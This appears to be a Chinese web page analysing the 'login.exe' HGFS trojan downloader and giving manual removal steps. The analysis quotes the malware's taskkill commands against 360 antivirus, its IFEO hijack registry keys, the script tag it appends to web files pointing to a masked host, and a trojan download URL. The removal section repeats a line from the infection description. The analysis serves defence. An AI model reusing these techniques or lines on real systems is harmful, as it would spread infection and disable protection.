login.exe HGFS木马下载器的手动查杀方法_病毒查杀

样本信息：File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:创建互斥量HGFSMUTEX，保证系统内只有一个实例在运行

2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网，如果是则利用ipc漏洞建立一个空连接，并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe

5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp，htm，html，aspx，php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效

解决方法：

1.复制如下文字到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

打开Xdelbox.exe
在下面的大框中单击右键点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键点击 “立即重启执行删除”
软件会自动重启计算机

重启计算机以后会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管，它会自动选择进入第二个系统
类似dos的界面滚动完毕以后病毒就被删除了
之后他会自动重启进入正常模式

2.打开sreng 启动项目注册表
删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站

时间： 2024-08-02 13:36:11

login.exe HGFS木马下载器的手动查杀方法_病毒查杀

login.exe HGFS木马下载器的手动查杀方法_病毒查杀的相关文章

关于WIN32.EXE变态木马下载器的解决办法_病毒查杀

木马下载器Win32.TrojDownloader.Delf.114688_病毒查杀

U盘病毒vistaAA.exe的手动查杀方法_病毒查杀

emapicn.exe,winpac.exe恶意插件疯弹广告解决方法_病毒查杀

HDM.exe手工查杀U盘病毒的方法_病毒查杀

桌面不显示图标的盗号木马清除方法_病毒查杀

替换ctfmon.exe的下载器window.exe的方法_病毒查杀

md9.exe scvhost.exe 只木马下载者查杀方法_病毒查杀

手工查杀SMSS.exe hook.dll fOxkb.sys的方法_病毒查杀